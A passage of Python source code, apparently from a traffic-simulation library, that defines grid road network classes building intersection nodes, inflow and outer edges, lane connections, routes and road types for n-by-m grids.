# if conn[0]['signal_group'] is None:
# del conn[0]['signal_group']
return conn
# build connections at each inner node
# node_ids = [edge['id'][-3:] for edge in self.edges]
for node_id in range(self.row_num * self.col_num):
conn = []
i = node_id // self.col_num
j = node_id % self.col_num
top_edge_id = "{}_{}".format(i+1, j) if i + 1 < self.row_num else None
bot_edge_id = "{}_{}".format(i, j) if i > 0 else None
left_edge_id = "{}_{}".format(i, j) if j > 0 else None
right_edge_id = "{}_{}".format(i, j+1) if j + 1 < self.col_num else None
assert self.vertical_lanes == self.horizontal_lanes
if right_edge_id is not None and top_edge_id is not None:
conn += new_con('top', right_edge_id, top_edge_id, None, 'right', 0, 0)
conn += new_con('left', top_edge_id, right_edge_id, None, 'bot', 0, 0)
if top_edge_id is not None and left_edge_id is not None:
conn += new_con('left', top_edge_id, left_edge_id, None, 'top', 0, self.sub_edge_num-1)
conn += new_con('bot', left_edge_id, top_edge_id, None, 'right', self.sub_edge_num-1, 0)
if bot_edge_id is not None and right_edge_id is not None:
conn += new_con('right', bot_edge_id, right_edge_id, None, "bot", self.sub_edge_num-1, 0)
conn += new_con('top', right_edge_id, bot_edge_id, None, "left", 0, self.sub_edge_num-1)
if bot_edge_id is not None and left_edge_id is not None:
conn += new_con('right', bot_edge_id, left_edge_id, None, "top", self.sub_edge_num-1, self.sub_edge_num-1)
conn += new_con('bot', left_edge_id, bot_edge_id, None, "left", self.sub_edge_num-1, self.sub_edge_num-1)
if top_edge_id is not None and bot_edge_id is not None:
conn += new_con('right', bot_edge_id, top_edge_id, 2)
conn += new_con('left', top_edge_id, bot_edge_id, 2)
if left_edge_id is not None and right_edge_id is not None:
conn += new_con('bot', left_edge_id, right_edge_id, 1)
conn += new_con('top', right_edge_id, left_edge_id, 1)
if top_edge_id is not None:
conn += new_con('left', top_edge_id, top_edge_id, None, 'right', 0, 0, True)
for n in range(self.sub_edge_num - 1):
conn += new_con('left', top_edge_id, top_edge_id, None, 'left', n+1, n)
if bot_edge_id is not None:
conn += new_con('right', bot_edge_id, bot_edge_id, None, 'left', self.sub_edge_num-1, self.sub_edge_num-1, True)
for n in range(self.sub_edge_num-1):
conn += new_con('right', bot_edge_id, bot_edge_id, None, 'right', n, n+1)
if left_edge_id is not None:
conn += new_con('bot', left_edge_id, left_edge_id, None, 'top', self.sub_edge_num-1, self.sub_edge_num-1, True)
for n in range(self.sub_edge_num-1):
conn += new_con('bot', left_edge_id, left_edge_id, None, 'bot', n, n+1)
if right_edge_id is not None:
conn += new_con('top', right_edge_id, right_edge_id, None, 'bot', 0, 0, True)
for n in range(self.sub_edge_num-1):
conn += new_con('top', right_edge_id, right_edge_id, None, 'top', n+1, n)
node_id = "center{}".format(node_id)
con_dict[node_id] = conn
return con_dict
# TODO necessary?
def specify_edge_starts(self):
"""See parent class."""
length = 0
edgestarts = []
for edge in self.edges:
# the current edge starts where the last edge ended
edgestarts.append((edge['id'], length))
# increment the total length of the network with the length of the
# current edge
length += float(edge['length'])
return edgestarts
@property
def node_mapping(self):
"""Map nodes to edges.
Returns a list of pairs (node, connected edges) of all inner nodes
and for each of them, the 4 edges that leave this node.
The nodes are listed in alphabetical order, and within that, edges are
listed in order: [bot, right, top, left].
"""
mapping = {}
for node_id in range(self.row_num * self.col_num):
conn = []
i = node_id // self.col_num
j = node_id % self.col_num
top_edge_id = "left{}_{}".format(i+1, j) if i + 1 < self.row_num else None
bot_edge_id = "right{}_{}".format(i, j) if i > 0 else None
left_edge_id = "bot{}_{}".format(i, j) if j > 0 else None
right_edge_id = "top{}_{}".format(i, j+1) if j + 1 < self.col_num else None
node_id = "center{}".format(node_id)
mapping[node_id] = [left_edge_id, bot_edge_id, right_edge_id, top_edge_id]
return sorted(mapping.items(), key=lambda x: x[0])
class GridnxmNetworkInflow(GridnxmNetwork):
def specify_nodes(self, net_params):
nodes = super().specify_nodes(net_params)
if 'inflow' in net_params.additional_params:
inflow = net_params.additional_params['inflow']
if 'top_left' in inflow:
nodes.append({
"id": "center_top_left",
"x": -.5 * self.inner_length,
"y": (self.row_num - 1) * self.inner_length,
"type": 'priority',
# "radius": self.inner_nodes_radius
})
nodes.append({
"id": "center_bot_right",
"x": (self.col_num - 0.5) * self.inner_length,
"y": 0.,
"type": 'priority',
# "radius": self.inner_nodes_radius
})
if 'midtop_left' in inflow:
nodes.append({
"id": "center_midtop_left",
"x": -.5 * self.inner_length,
"y": (self.row_num - 2) * self.inner_length,
"type": 'priority',
# "radius": self.inner_nodes_radius
})
if 'midbot_left' in inflow:
nodes.append({
"id": "center_midbot_left",
"x": -.5 * self.inner_length,
"y": (self.row_num - 3) * self.inner_length,
"type": 'priority',
# "radius": self.inner_nodes_radius
})
if 'top_midleft' in inflow:
nodes.append({
"id": "center_top_midleft",
"x": self.inner_length,
"y": (self.row_num - 0.5) * self.inner_length,
"type": 'priority',
# "radius": self.inner_nodes_radius
})
if 'top_midright' in inflow:
nodes.append({
"id": "center_top_midright",
"x": 2. * self.inner_length,
"y": (self.row_num - 0.5) * self.inner_length,
"type": 'priority',
# "radius": self.inner_nodes_radius
})
return nodes
def specify_edges(self, net_params):
edges = super().specify_edges(net_params)
if 'inflow' in net_params.additional_params:
inflow = net_params.additional_params['inflow']
if 'top_left' in inflow:
edges.append({
"id": "inflow_top_left",
"type": 'horizontal',
"priority": 78,
"from": "center_top_left",
"to": "center{}".format((self.row_num - 1) * self.col_num),
"length": self.inner_length / self.sub_edge_num / 2
})
edges.append({
"id": "outflow_bot_right",
"type": 'horizontal',
"priority": 78,
"from": "center{}".format(self.col_num - 1),
"to": "center_bot_right",
"length": self.inner_length / self.sub_edge_num / 2
})
if 'midtop_left' in inflow:
edges.append({
"id": "inflow_midtop_left",
"type": "horizontal",
"priority": 78,
"from": "center_midtop_left",
"to": "center{}".format((self.row_num - 2) * self.col_num),
"length": self.inner_length / self.sub_edge_num / 2
})
if 'midbot_left' in inflow:
edges.append({
"id": "inflow_midbot_left",
"type": "horizontal",
"priority": 78,
"from": "center_midbot_left",
"to": "center{}".format((self.row_num - 3) * self.col_num),
"length": self.inner_length / self.sub_edge_num / 2
})
if 'top_midleft' in inflow:
edges.append({
"id": "inflow_top_midleft",
"type": "vertical",
"priority": 78,
"from": "center_top_midleft",
"to": "center{}".format((self.row_num - 1) * self.col_num + 1),
"length": self.inner_length / self.sub_edge_num / 2
})
if 'top_midright' in inflow:
edges.append({
"id": "inflow_top_midright",
"type": "vertical",
"priority": 78,
"from": "center_top_midright",
"to": "center{}".format((self.row_num - 1) * self.col_num + 2),
"length": self.inner_length / self.sub_edge_num / 2
})
return edges
def specify_connections(self, net_params):
con_dict = super().specify_connections(net_params)
if 'inflow' in net_params.additional_params:
inflow = net_params.additional_params['inflow']
if 'top_left' in inflow:
node_id = "center{}".format((self.row_num - 1) * self.col_num)
con_dict[node_id].append({
"from": 'inflow_top_left',
"to": 'left{}_0_0'.format(self.row_num - 1),
"fromLane": str(0),
"toLane": str(0),
})
con_dict[node_id].append({
"from": 'inflow_top_left',
"to": 'bot{}_1_0'.format(self.row_num - 1),
"fromLane": str(0),
"toLane": str(0),
})
con_dict[node_id].append({
"from": 'bot0_{}_0'.format(self.col_num - 1),
"to": 'outflow_bot_right',
"fromLane": str(0),
"toLane": str(0),
})
con_dict[node_id].append({
"from": 'left1_{}_0'.format(self.row_num - 1),
"to": 'outflow_bot_right',
"fromLane": str(0),
"toLane": str(0),
})
if 'midtop_left' in inflow:
node_id = "center{}".format((self.row_num - 2) * self.col_num)
con_dict[node_id].append({
"from": 'inflow_midtop_left',
"to": 'left{}_0_0'.format(self.row_num - 2),
"fromLane": str(0),
"toLane": str(0),
})
con_dict[node_id].append({
"from": 'inflow_midtop_left',
"to": 'bot{}_1_0'.format(self.row_num - 2),
"fromLane": str(0),
"toLane": str(0),
})
if 'midbot_left' in inflow:
node_id = "center{}".format((self.row_num - 3) * self.col_num)
con_dict[node_id].append({
"from": 'inflow_midbot_left',
"to": 'left{}_0_0'.format(self.row_num - 3),
"fromLane": str(0),
"toLane": str(0),
})
con_dict[node_id].append({
"from": 'inflow_midbot_left',
"to": 'bot{}_1_0'.format(self.row_num - 3),
"fromLane": str(0),
"toLane": str(0),
})
if 'top_midleft' in inflow:
node_id = "center{}".format((self.row_num - 1) * self.col_num + 1)
con_dict[node_id].append({
"from": 'inflow_top_midleft',
"to": 'left{}_1_0'.format(self.row_num - 1),
"fromLane": str(0),
"toLane": str(0),
})
con_dict[node_id].append({
"from": 'inflow_top_midleft',
"to": 'bot{}_2_0'.format(self.row_num - 1),
"fromLane": str(0),
"toLane": str(0),
})
if 'top_midright' in inflow:
node_id = "center{}".format((self.row_num - 1) * self.col_num + 2)
con_dict[node_id].append({
"from": 'inflow_top_midright',
"to": 'left{}_2_0'.format(self.row_num - 1),
"fromLane": str(0),
"toLane": str(0),
})
con_dict[node_id].append({
"from": 'inflow_top_midright',
"to": 'bot{}_3_0'.format(self.row_num - 1),
"fromLane": str(0),
"toLane": str(0),
})
return con_dict
class GridnxmNetworkExpand(GridnxmNetwork):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.outer_length = self.grid_array['outer_length']
@property
def _outer_nodes(self):
"""Build out the outer nodes of the network.
The outer nodes correspond to the extremities of the roads. There are
two at each extremity, one where the vehicles enter the network
(inflow) and one where the vehicles exit the network (outflow).
Consider the following network with 2 rows and 3 columns, where the
extremities are marked by 'x', the rows are labeled from 0 to 1 and the
columns are labeled from 0 to 2:
x x x
| | |
(1) x----|-----|-----|----x (*)
| | |
(0) x----|-----|-----|----x
| | |
x x x
(0) (1) (2)
On row i, there are two nodes at the left extremity of the row, labeled
"left_row_in{i}" and "left_row_out{i}", as well as two nodes at the
right extremity labeled "right_row_in{i}" and "right_row_out{i}".
On column j, there are two nodes at the bottom extremity of the column,
labeled "bot_col_in{j}" and "bot_col_out{j}", as well as two nodes
at the top extremity labeled "top_col_in{j}" and "top_col_out{j}".
The "in" nodes correspond to where vehicles enter the network while
the "out" nodes correspond to where vehicles exit the network.
For example, at extremity (*) on row (1):
- the id of the input node is "right_row_in1"
- the id of the output node is "right_row_out1"
Returns
-------
list <dict>
List of outer nodes
"""
nodes = []
def new_node(x, y, name, i):
return [{"id": name + str(i), "x": x, "y": y, "type": "priority"}]
# build nodes at the extremities of columns
for col in range(self.col_num):
x = col * self.inner_length
y = (self.row_num - 1) * self.inner_length
nodes += new_node(x, - self.outer_length, "bot_col_in", col)
nodes += new_node(x, - self.outer_length, "bot_col_out", col)
nodes += new_node(x, y + self.outer_length, "top_col_in", col)
nodes += new_node(x, y + self.outer_length, "top_col_out", col)
# build nodes at the extremities of rows
for row in range(self.row_num):
x = (self.col_num - 1) * self.inner_length
y = row * self.inner_length
nodes += new_node(- self.outer_length, y, "left_row_in", row)
nodes += new_node(- self.outer_length, y, "left_row_out", row)
nodes += new_node(x + self.outer_length, y, "right_row_in", row)
nodes += new_node(x + self.outer_length, y, "right_row_out", row)
return nodes
@property
def _outer_edges(self):
"""Build out the outer edges of the network.
The outer edges are the edges joining the inner nodes to the outer
nodes.
Consider the following network with n = 2 rows and m = 3 columns,
where the rows are indexed from 0 to 1 and the columns from 0 to 2, the
inner nodes are marked by 'x' and the outer nodes by 'o':
o o o
| | |
(1) o---x----x----x-(*)-o
| | |
(0) o---x----x----x-----o
| | |
o o o
(0) (1) (2)
There are n * 2 = 4 horizontal outer edges and m * 2 = 6 vertical outer
edges, all that multiplied by two because each edge consists of two
roads going in opposite directions traffic-wise.
On row i, there are four horizontal edges: the left ones labeled
"in_bot{i}_0" (in) and "out_top{i}_0" (out) and the right ones labeled
"out_bot{i}_{m}" (out) and "in_top{i}_{m}" (in).
On column j, there are four vertical edges: the bottom ones labeled
"out_left0_{j}" (out) and "in_right0_{j}" (in) and the top ones labeled
"in_left{n}_{j}" (in) and "out_right{n}_{j}" (out).
For example, on edge (*) on row (1): the id of the bottom road (out)
is "out_bot1_3" and the id of the top road is "in_top1_3".
Edges labeled by "in" are edges where vehicles enter the network while
edges labeled by "out" are edges where vehicles exit the network.
Returns
-------
list <dict>
List of outer edges
"""
edges = []
def new_edge(index, from_node, to_node, orientation, length):
return [{
"id": index,
"type": {"v": "vertical", "h": "horizontal"}[orientation],
"priority": 78,
"from": from_node,
"to": to_node,
"length": length
}]
for i in range(self.col_num):
# bottom edges
id1 = "in_right0_{}".format(i)
id2 = "out_left0_{}".format(i)
node1 = "bot_col_in{}".format(i)
node2 = "center{}".format(i)
node3 = "bot_col_out{}".format(i)
edges += new_edge(id1, node1, node2, "v", self.outer_length)
edges += new_edge(id2, node2, node3, "v", self.outer_length)
# top edges
id1 = "in_left{}_{}".format(self.row_num, i)
id2 = "out_right{}_{}".format(self.row_num, i)
node1 = "top_col_in{}".format(i)
node2 = "center{}".format((self.row_num - 1) * self.col_num + i)
node3 = "top_col_out{}".format(i)
edges += new_edge(id1, node1, node2, "v", self.outer_length)
edges += new_edge(id2, node2, node3, "v", self.outer_length)
for j in range(self.row_num):
# left edges
id1 = "in_bot{}_0".format(j)
id2 = "out_top{}_0".format(j)
node1 = "left_row_in{}".format(j)
node2 = "center{}".format(j * self.col_num)
node3 = "left_row_out{}".format(j)
edges += new_edge(id1, node1, node2, "h", self.outer_length)
edges += new_edge(id2, node2, node3, "h", self.outer_length)
# right edges
id1 = "in_top{}_{}".format(j, self.col_num)
id2 = "out_bot{}_{}".format(j, self.col_num)
node1 = "right_row_in{}".format(j)
node2 = "center{}".format((j + 1) * self.col_num - 1)
node3 = "right_row_out{}".format(j)
edges += new_edge(id1, node1, node2, "h", self.outer_length)
edges += new_edge(id2, node2, node3, "h", self.outer_length)
return edges
def specify_nodes(self, net_params):
inner_nodes = super().specify_nodes(net_params)
return inner_nodes + self._outer_nodes
def specify_edges(self, net_params):
inner_edges = super().specify_edges(net_params)
return inner_edges + self._outer_edges
def specify_connections(self, net_params):
"""Build out connections at each inner node.
"""
con_dict = super().specify_connections(net_params)
def new_con(side, from_id, to_id, toside, from_sub_id=None, to_sub_id=None):
assert "out" not in side
assert "in" not in toside
lane1s = range(self.vertical_lanes)
lane2s = range(self.vertical_lanes)
conn = []
lane1s = range(self.vertical_lanes)
for lane1 in lane1s:
for lane2 in lane2s:
conn.append({
"from": side + from_id + "_{}".format(from_sub_id) if from_sub_id is not None else side + from_id,
"to": toside + to_id + "_{}".format(to_sub_id) if to_sub_id is not None else toside + to_id,
"fromLane": str(lane1),
"toLane": str(lane2),
})
return conn
# build connections at each inner node
# node_ids = [edge['id'][-3:] for edge in self.edges]
for node_id in range(self.row_num * self.col_num):
conn = []
i = node_id // self.col_num
j = node_id % self.col_num
top_edge_id = "{}_{}".format(i+1, j) # if i + 1 < self.row_num else None
bot_edge_id = "{}_{}".format(i, j) # if i > 0 else None
left_edge_id = "{}_{}".format(i, j) # if j > 0 else None
right_edge_id = "{}_{}".format(i, j+1) # if j + 1 < self.col_num else None
assert self.vertical_lanes == self.horizontal_lanes
# bottom left
if i == 0 and j == 0:
conn += new_con("in_right", bot_edge_id, top_edge_id, "right", to_sub_id=0)
conn += new_con("left", top_edge_id, bot_edge_id, "out_left", from_sub_id=0)
conn += new_con("in_bot", left_edge_id, right_edge_id, "bot", to_sub_id=0)
conn += new_con("top", right_edge_id, left_edge_id, "out_top", from_sub_id=0)
conn += new_con('in_bot', left_edge_id, top_edge_id, "right", to_sub_id=0)
conn += new_con('left', top_edge_id, left_edge_id, 'out_top', from_sub_id=0)
conn += new_con("in_right", bot_edge_id, right_edge_id, "bot", to_sub_id=0)
conn += new_con("top", right_edge_id, bot_edge_id, "out_left", from_sub_id=0)
conn += new_con("in_bot", left_edge_id, bot_edge_id, "out_left")
conn += new_con("in_right", bot_edge_id, left_edge_id, "out_top")
# bottom right
elif i == 0 and j + 1 == self.col_num:
conn += new_con("in_right", bot_edge_id, top_edge_id, "right", to_sub_id=0)
conn += new_con("left", top_edge_id, bot_edge_id, "out_left", from_sub_id=0)
conn += new_con("bot", left_edge_id, right_edge_id, "out_bot", from_sub_id=0)
conn += new_con("in_top", right_edge_id, left_edge_id, "top", to_sub_id=0)
conn += new_con('in_top', right_edge_id, top_edge_id, "right", to_sub_id=0)
conn += new_con('left', top_edge_id, right_edge_id, 'out_bot', from_sub_id=0)
conn += new_con("bot", left_edge_id, bot_edge_id, "out_left", from_sub_id=self.sub_edge_num-1)
conn += new_con("in_right", bot_edge_id, left_edge_id, "top", to_sub_id=self.sub_edge_num-1)
conn += new_con("in_right", bot_edge_id, right_edge_id, "out_bot")
conn += new_con("in_top", right_edge_id, bot_edge_id, "out_left")
# top left
elif i + 1 == self.row_num and j == 0:
conn += new_con("right", bot_edge_id, top_edge_id, "out_right", from_sub_id=self.sub_edge_num-1)
conn += new_con("in_left", top_edge_id, bot_edge_id, "left", to_sub_id=self.sub_edge_num-1)
conn += new_con("in_bot", left_edge_id, right_edge_id, "bot", to_sub_id=0)
conn += new_con("top", right_edge_id, left_edge_id, "out_top", from_sub_id=0)
conn += new_con("in_left", top_edge_id, right_edge_id, "bot", to_sub_id=0)
conn += new_con("top", right_edge_id, top_edge_id, "out_right", from_sub_id=0)
conn += new_con("in_bot", left_edge_id, bot_edge_id, "left", to_sub_id=self.sub_edge_num-1)
conn += new_con("right", bot_edge_id, left_edge_id, "out_top", from_sub_id=self.sub_edge_num-1)
conn += new_con('in_bot', left_edge_id, top_edge_id, "out_right")
conn += new_con('in_left', top_edge_id, left_edge_id, "out_top")
# top right
elif i + 1 == self.row_num and j + 1 == self.col_num:
conn += new_con("right", bot_edge_id, top_edge_id, "out_right", from_sub_id=self.sub_edge_num-1)
conn += new_con("in_left", top_edge_id, bot_edge_id, "left", to_sub_id=self.sub_edge_num-1)
conn += new_con("bot", left_edge_id, right_edge_id, "out_bot", from_sub_id=self.sub_edge_num-1)
conn += new_con("in_top", right_edge_id, left_edge_id, "top", to_sub_id=self.sub_edge_num-1)
conn += new_con("in_top", right_edge_id, bot_edge_id, "left", to_sub_id=self.sub_edge_num-1)
conn += new_con("right", bot_edge_id, right_edge_id, "out_bot", from_sub_id=self.sub_edge_num-1)
conn += new_con('bot', left_edge_id, top_edge_id, "out_right", from_sub_id=self.sub_edge_num-1)
conn += new_con('in_left', top_edge_id, left_edge_id, "top", to_sub_id=self.sub_edge_num-1)
conn += new_con("in_left", top_edge_id, right_edge_id, "out_bot")
conn += new_con("in_top", right_edge_id, top_edge_id, "out_right")
# bot
elif i == 0:
conn += new_con("in_right", bot_edge_id, top_edge_id, "right", to_sub_id=0)
conn += new_con("left", top_edge_id, bot_edge_id, "out_left", from_sub_id=0)
conn += new_con("in_right", bot_edge_id, right_edge_id, "bot", to_sub_id=0)
conn += new_con("top", right_edge_id, bot_edge_id, "out_left", from_sub_id=0)
conn += new_con("bot", left_edge_id, bot_edge_id, "out_left", from_sub_id=self.sub_edge_num-1)
conn += new_con("in_right", bot_edge_id, left_edge_id, "top", to_sub_id=self.sub_edge_num-1)
# left
elif j == 0:
conn += new_con("in_bot", left_edge_id, right_edge_id, "bot", to_sub_id=0)
conn += new_con("top", right_edge_id, left_edge_id, "out_top", from_sub_id=0)
conn += new_con('in_bot', left_edge_id, top_edge_id, "right", to_sub_id=0)
conn += new_con('left', top_edge_id, left_edge_id, 'out_top', from_sub_id=0)
conn += new_con("in_bot", left_edge_id, bot_edge_id, "left", to_sub_id=self.sub_edge_num-1)
conn += new_con("right", bot_edge_id, left_edge_id, "out_top", from_sub_id=self.sub_edge_num-1)
# top
elif i + 1 == self.row_num:
conn += new_con("right", bot_edge_id, top_edge_id, "out_right", from_sub_id=self.sub_edge_num-1)
conn += new_con("in_left", top_edge_id, bot_edge_id, "left", to_sub_id=self.sub_edge_num-1)
conn += new_con("in_left", top_edge_id, right_edge_id, "bot", to_sub_id=0)
conn += new_con("top", right_edge_id, top_edge_id, "out_right", from_sub_id=0)
conn += new_con('bot', left_edge_id, top_edge_id, "out_right", from_sub_id=self.sub_edge_num-1)
conn += new_con('in_left', top_edge_id, left_edge_id, "top", to_sub_id=self.sub_edge_num-1)
# right
elif j + 1 == self.col_num:
conn += new_con("bot", left_edge_id, right_edge_id, "out_bot", from_sub_id=self.sub_edge_num-1)
conn += new_con("in_top", right_edge_id, left_edge_id, "top", to_sub_id=self.sub_edge_num-1)
conn += new_con("in_top", right_edge_id, bot_edge_id, "left", to_sub_id=self.sub_edge_num-1)
conn += new_con("right", bot_edge_id, right_edge_id, "out_bot", from_sub_id=self.sub_edge_num-1)
conn += new_con("left", top_edge_id, right_edge_id, "out_bot", from_sub_id=0)
conn += new_con("in_top", right_edge_id, top_edge_id, "right", to_sub_id=0)
node_id = "center{}".format(node_id)
con_dict[node_id] += conn
return con_dict
class GridnxmNetworkExpand_with_Index(Network):
"""Traffic Light Grid network class.
The traffic light grid network consists of m vertical lanes and n
horizontal lanes, with a total of nxm intersections where the vertical
and horizontal edges meet.
Requires from net_params:
* **grid_array** : dictionary of grid array data, with the following keys
* **row_num** : number of horizontal rows of edges
* **col_num** : number of vertical columns of edges
* **inner_length** : length of inner edges in traffic light grid network
* **horizontal_lanes** : number of lanes in the horizontal edges
* **vertical_lanes** : number of lanes in the vertical edges
* **speed_limit** : speed limit for all edges. This may be represented as a
float value, or a dictionary with separate values for vertical and
horizontal lanes.
"""
def __init__(self,
name,
vehicles,
net_params,
persons=PersonParams(),
initial_config=InitialConfig(),
traffic_lights=TrafficLightParams()):
"""Initialize an n*m traffic light grid network."""
optional = ["tl_logic", "outer_length"]
for p in ADDITIONAL_NET_PARAMS.keys():
if p not in net_params.additional_params and p not in optional:
raise KeyError('Network parameter "{}" not supplied'.format(p))
for p in ADDITIONAL_NET_PARAMS["grid_array"].keys():
if p not in net_params.additional_params["grid_array"] and p not in optional:
raise KeyError(
'Grid array parameter "{}" not supplied'.format(p))
# retrieve all additional parameters
# refer to the ADDITIONAL_NET_PARAMS dict for more documentation
self.vertical_lanes = net_params.additional_params["vertical_lanes"]
self.horizontal_lanes = net_params.additional_params[
"horizontal_lanes"]
self.speed_limit = net_params.additional_params["speed_limit"]
if not isinstance(self.speed_limit, dict):
self.speed_limit = {
"horizontal": self.speed_limit,
"vertical": self.speed_limit
}
self.grid_array = net_params.additional_params["grid_array"]
self.row_num = self.grid_array["row_num"]
self.col_num = self.grid_array["col_num"]
self.row_idx_num = self.grid_array["row_idx"]
self.col_idx_num = self.grid_array["col_idx"]
self.inner_length = self.grid_array["inner_length"]
self.outer_length = self.grid_array.get("outer_length", None)
assert self.outer_length == self.inner_length // 2
self.sub_edge_num = self.grid_array.get("sub_edge_num", 1)
# specifies whether or not there will be traffic lights at the
# intersections (False by default)
self.use_traffic_lights = net_params.additional_params.get(
"traffic_lights", False)
# radius of the inner nodes (ie of the intersections)
# self.inner_nodes_radius = 2.9 + 3.3 * max(self.vertical_lanes,
# self.horizontal_lanes)
self.inner_nodes_radius = 0
# total number of edges in the network
self.num_edges = self.col_idx_num * self.row_idx_num * (2 * self.col_num * self.row_num + self.col_num + self.row_num)
# name of the network (DO NOT CHANGE)
self.name = "BobLoblawsLawBlog"
super().__init__(name, vehicles, net_params, persons, initial_config,
traffic_lights)
def specify_nodes(self, net_params):
"""Build out the inner nodes of the network.
The inner nodes correspond to the intersections between the roads. They
are numbered from bottom left, increasing first across the columns and
then across the rows.
For example, the nodes in a traffic light grid with 2 rows and 3 columns
would be indexed as follows:
| | |
--- 3 --- 4 --- 5 ---
| | |
--- 0 --- 1 --- 2 ---
| | |
The id of a node is then "center{index}", for instance "center0" for
node 0, "center1" for node 1 etc.
Returns
-------
list <dict>
List of inner nodes
"""
node_type = "traffic_light" if self.use_traffic_lights else "priority"
nodes = []
for row in range(self.row_num):
for col in range(self.col_num):
for row_idx in range(self.row_idx_num):
for col_idx in range(self.col_idx_num):
nodes.append({
"id": "center{}_{}".format(row * self.col_num + col, row_idx * self.col_idx_num + col_idx),
"x": col * self.inner_length + col_idx * self.col_num * self.inner_length,
"y": row * self.inner_length + row_idx * self.row_num * self.inner_length,
"type": node_type,
# "radius": self.inner_nodes_radius
})
inserted_nodes = []
for col in range(self.col_num * self.col_idx_num):
for row_idx in range(self.row_idx_num + 1):
inserted_nodes.append({
"id": "row_{}_{}_left".format(col, row_idx),
"x": col * self.inner_length,
"y": row_idx * self.row_num * self.inner_length - self.outer_length,
"type": "priority",
})
inserted_nodes.append({
"id": "row_{}_{}_right".format(col, row_idx),
"x": col * self.inner_length,
"y": row_idx * self.row_num * self.inner_length - self.outer_length,
"type": "priority",
})
for row in range(self.row_num * self.row_idx_num):
for col_idx in range(self.col_idx_num + 1):
inserted_nodes.append({
"id": "col_{}_{}_bot".format(row, col_idx),
"x": col_idx * self.col_num * self.inner_length - self.outer_length,
"y": row * self.inner_length,
"type": "priority",
})
inserted_nodes.append({
"id": "col_{}_{}_top".format(row, col_idx),
"x": col_idx * self.col_num * self.inner_length - self.outer_length,
"y": row * self.inner_length,
"type": "priority",
})
return nodes + inserted_nodes
def specify_edges(self, net_params):
"""Build out the inner edges of the network.
The inner edges are the edges joining the inner nodes to each other.
Consider the following network with n = 2 rows and m = 3 columns,
where the rows are indexed from 0 to 1 and the columns from 0 to 2, and
the inner nodes are marked by 'x':
| | |
(1) ----x-----x-----x----
| | |
(0) ----x-----x-(*)-x----
| | |
(0) (1) (2)
There are n * (m - 1) = 4 horizontal inner edges and (n - 1) * m = 3
vertical inner edges, all that multiplied by two because each edge
consists of two roads going in opposite directions traffic-wise.
On an horizontal edge, the id of the top road is "top{i}_{j}" and the
id of the bottom road is "bot{i}_{j}", where i is the index of the row
where the edge is and j is the index of the column to the right of it.
On a vertical edge, the id of the right road is "right{i}_{j}" and the
id of the left road is "left{i}_{j}", where i is the index of the row
above the edge and j is the index of the column where the edge is.
For example, on edge (*) on row (0): the id of the bottom road (traffic
going from left to right) is "bot0_2" and the id of the top road
(traffic going from right to left) is "top0_2".
Returns
-------
list <dict>
List of inner edges
"""
edges = []
def new_edge(index, from_node, to_node, orientation, lane, area_index):
assert from_node != to_node
node_list = ["center{}_{}".format(from_node, area_index)] + ["center{}_{}".format(to_node, area_index)]
new_edges = []
new_edges.append({
"id": "{}{}_{}".format(lane, index, area_index),
"type": orientation,
"priority": 78,
"from": node_list[0],
"to": node_list[1],
"length": self.inner_length
})
return new_edges
# Build the horizontal inner edges
for i in range(self.row_num):
for j in range(self.col_num - 1):
for row_idx in range(self.row_idx_num):
for col_idx in range(self.col_idx_num):
area_idx = row_idx * self.col_idx_num + col_idx
node_index = i * self.col_num + j
index = "{}_{}".format(i, j + 1)
edges += new_edge(index, node_index + 1, node_index,
"horizontal", "top", area_idx)
edges += new_edge(index, node_index, node_index + 1,
"horizontal", "bot", area_idx)
# Build the vertical inner edges
for i in range(self.row_num - 1):
for j in range(self.col_num):
for row_idx in range(self.row_idx_num):
for col_idx in range(self.col_idx_num):
area_idx = row_idx * self.col_idx_num + col_idx
node_index = i * self.col_num + j
index = "{}_{}".format(i + 1, j)
edges += new_edge(index, node_index, node_index + self.col_num,
"vertical", "right", area_idx)
edges += new_edge(index, node_index + self.col_num, node_index,
"vertical", "left", area_idx)
# Build vertical and horizontal flow edges
for row_idx in range(self.row_idx_num):
for col_idx in range(self.col_idx_num):
for col in range(self.col_num):
col_true = col + col_idx * self.col_num
area_idx = row_idx * self.col_idx_num + col_idx
edges += [{
"id": "in_left{}_{}".format(col, area_idx),
"type": "vertical",
"priority": 78,
"from": "row_{}_{}_left".format(col_true, row_idx + 1),
"to": "center{}_{}".format((self.row_num - 1) * self.col_num + col, area_idx),
"length": self.outer_length
}]
edges += [{
"id": "out_right{}_{}".format(col, area_idx),
"type": "vertical",
"priority": 78,
"from": "center{}_{}".format((self.row_num - 1) * self.col_num + col, area_idx),
"to": "row_{}_{}_right".format(col_true, row_idx + 1),
"length": self.outer_length
}]
edges += [{
"id": "in_right{}_{}".format(col, area_idx),
"type": "vertical",
"priority": 78,
"from": "row_{}_{}_right".format(col_true, row_idx),
"to": "center{}_{}".format(col, area_idx),
"length": self.outer_length
}]
edges += [{
"id": "out_left{}_{}".format(col, area_idx),
"type": "vertical",
"priority": 78,
"from": "center{}_{}".format(col, area_idx),
"to": "row_{}_{}_left".format(col_true, row_idx),
"length": self.outer_length
}]
for row in range(self.row_num):
row_true = row + row_idx * self.row_num
area_idx = row_idx * self.col_idx_num + col_idx
edges += [{
"id": "in_top{}_{}".format(row, area_idx),
"type": "horizontal",
"priority": 78,
"from": "col_{}_{}_top".format(row_true, col_idx + 1),
"to": "center{}_{}".format(row * self.col_num + self.col_num - 1, area_idx),
"length": self.outer_length
}]
edges += [{
"id": "out_bot{}_{}".format(row, area_idx),
"type": "horizontal",
"priority": 78,
"from": "center{}_{}".format(row * self.col_num + self.col_num - 1, area_idx),
"to": "col_{}_{}_bot".format(row_true, col_idx + 1),
"length": self.outer_length
}]
edges += [{
"id": "in_bot{}_{}".format(row, area_idx),
"type": "horizontal",
"priority": 78,
"from": "col_{}_{}_bot".format(row_true, col_idx),
"to": "center{}_{}".format(row * self.col_num, area_idx),
"length": self.outer_length
}]
edges += [{
"id": "out_top{}_{}".format(row, area_idx),
"type": "horizontal",
"priority": 78,
"from": "center{}_{}".format(row * self.col_num, area_idx),
"to": "col_{}_{}_top".format(row_true, col_idx),
"length": self.outer_length
}]
return edges
def specify_routes(self, net_params):
"""See parent class."""
routes = {}
edges = self.specify_edges(net_params)
for edge in edges:
routes[edge['id']] = [edge['id']]
return routes
def specify_types(self, net_params):
"""See parent class."""
types = [{
"id": "horizontal",
"numLanes": self.horizontal_lanes,
"speed": self.speed_limit["horizontal"]
}, {
"id": "vertical",
"numLanes": self.vertical_lanes,
"speed": self.speed_limit["vertical"]
}]
return types
# ===============================
